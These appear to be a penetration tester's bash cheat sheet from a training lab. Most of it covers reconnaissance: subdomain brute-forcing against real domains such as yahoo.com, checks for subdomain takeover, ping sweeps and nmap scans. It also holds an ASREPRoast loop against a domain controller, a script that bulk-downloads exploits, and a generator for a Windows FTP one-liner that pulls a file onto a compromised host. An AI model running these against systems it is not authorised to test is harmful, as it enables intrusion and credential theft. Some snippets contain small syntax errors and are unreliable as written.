Bash Voodoo

#Figure out whether the last command worked or not

echo $? 

#Find out whether a given domain resolves

if host target.com; then echo “It Resolves”; fi

#enumerate subdomains

while read sub; do echo "$sub.sbtuk.net"; done < subdomains.txt

#touch a subdomains.txtseparetely, file contains:
admin
test
qa
dev
www
m
blog

#Bruteforce subdomains | chmod 777 and run

#!/bin/bash
while read sub; do
    if host $sub.yahoo.com; then
    echo "$sub.yahoo.com"
    
    fi
done < subdomains.txt    

#Resolving CNAMES script | cnames.sh

##Use the subdomains.txt list above to enumerate for hostile takeover##

#!/bin/bash

domain=$1
while read sub; do
         cname=$(host -t CNAME $sub.$domain | grep 'an alias' | awk '{print $NF}')
         
          if [ -z "$cname" ]; then
              continue
          fi 
          if ! host $cname &> /dev/null; then
              echo "$cname did not resolve ($sub.$domain)";
          fi
done                  
               

#Concatenate the scripts to bruteforce yahoo.com

cat subdomains.txt | ./cnames.sh yahoo.com 

#export IP variable

export IP=192.168.101.57
nmap -sC -sV -oA quick $IP

#Repeat the last command

!1

OR

!!

#Reverse-i search

press ctrl + r , then type dpkg (to look for dpkg in history)

#History tricks

export HISTCONTROL=ignoredups   #ignores duplicate commands

export HISTIGNORE="&:ls:[bf]g:exit:history" #ignores common commands

#Assign a command to a variable

user=$(whoami)

echo $user

#URL generator script

#!/bin/bash

for i in {tokyo,beijing,newyork,rome,bangkok,osaka}; do
   for j in {0..9}; do
      for k in {0..9}; do
         echo "http://example/com/$i/$j/$k" >> password.txt
      done
   done
done

#ping sweep script

#!/bin/bash

#if you do a ping-sweep with host the command will take about a second to complete. 
#And if you run that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every execution to make it faster.
#We #use the & to daemonize it.

#!/bin/bash

for ip in $(cat ips.txt); do
    ping -c 1 $ip &
done

#Print out all IPs in a given subnet

for ip in $(seq 1 10); do echo 10.11.1.$ip; done

#Variation with braces instead of seq to specify a range

for i in {0..255}; do echo 10.11.1.$i;done 

#Same output but using a while loop instead
-lt  flag stands for “less than”
(will print out 1 - 9 and exclude 10)


#!/bin/bash
# while loop example
counter=1
while [ $counter -lt 10 ]
do
echo "10.11.1.$counter"
((counter++))
done

#Create a list of hosts and redirect output to a list.txt
#This command will print out all possible addresses in Lab subnet 

for i in {0..254}; do echo 10.11.1.$i;done 


#Redirecting output to a file
for i in {1..10}; do echo 10.11.1.$i >> list.txt;done 

#wget a given target and use grep/bash to filter for subdomains

sudo wget www.megacorpone.com

#use grep “href=” to extract all the lines in index.html that contain HTML links

grep "href=" index.html

#beautify the output

grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' 

#using cut to only leave subdomains

grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1

#grep -o returns the string defined in the regular expression

grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt

‘[^/]*\.megacorpone\.com’     this is the string we are looking for

#DNS recon scripts

for i in {0..255}; do echo 10.11.1.$i >> list.txt;done 

Then:

for url in $(cat list.txt); do host $url; done 

#Parse through output grepping for available addresses

for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u


#Using curl

#Similar to wget technique but with curl

curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test

#Beautify output
curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u

#Parsing with grep
for url in $(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u); do host $url | grep 'has address' | cut -d' ' -f4; done

#Running Autorecon against an entire subnet

#Use nmap sweep to check all ports

nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254 

cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u
 
#Redirect output to another file  --> targets.txt 
 
 
cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u > targets.txt

autorecon targets.txt

#Workaround to use nmapAutomator against a subnet

for ip in $(cat targets.txt); do bash /usr/local/bin/nmapAutomator.sh --host $ip --type Full -o scan.txt & done

#Reverse lookup script

#!/bin/bash
 
i="1"
 
echo "Please enter first 3 octets. e.g 192.168.1"
read subnet
        while [ $i -le 254 ]; do
        host -l "$subnet"."$i"
        i=$(( $i + 1))
        done

#check ASREPRoast for all domain users (without credentials)

for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 domain/${user} | grep -v Impacket; done

#Bash customization | edit /etc/bash.bashrc with root privileges

nano /etc/bash.bashrc

alias gobustLin = sudo gobuster dir -e u --url http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip

#Search for a given exploit and download all matches

#!/bin/bash
#replace redcliff debian with keywords to search for
for e in $(searchsploit redcliff debian -w -t | grep http | cut -f 2 -d "|")
do
exp_name=$(echo $e | cut -d "/" -f 5) url=$(echo $e | sed 's/exploits/raw/')
wget -q --no-check-certificate $url -O $exp_name
done

#FTP script to spawn a one-liner for downloading

#!/bin/bash
#Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file.

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

echo
echo -e "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script."
echo

# change tun0 to your interface if needed
ip=$(ifconfig tun0 | grep inet | cut -d" " -f10 | head -1)
echo -e "Using IP address of tun0: $ip"
echo

echo -e "What port do you want the ftp server to run on? Hit enter for default of 21${nc}"
read port

if [[ -z "$port" ]];
	then
		ftpport="21"
	else
		ftpport="$port"
fi

echo
echo -e "${yellow}Enter the username: ${nc}"
read user
echo
echo -e "${yellow}Enter the password: ${nc}"
read pass

echo
echo -e "${yellow}What file do you want the remote host to download?${nc}"
read file

echo
echo -e "${yellow}Paste the below to create a ftp script and run it:${nc}"
echo
echo "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"
echo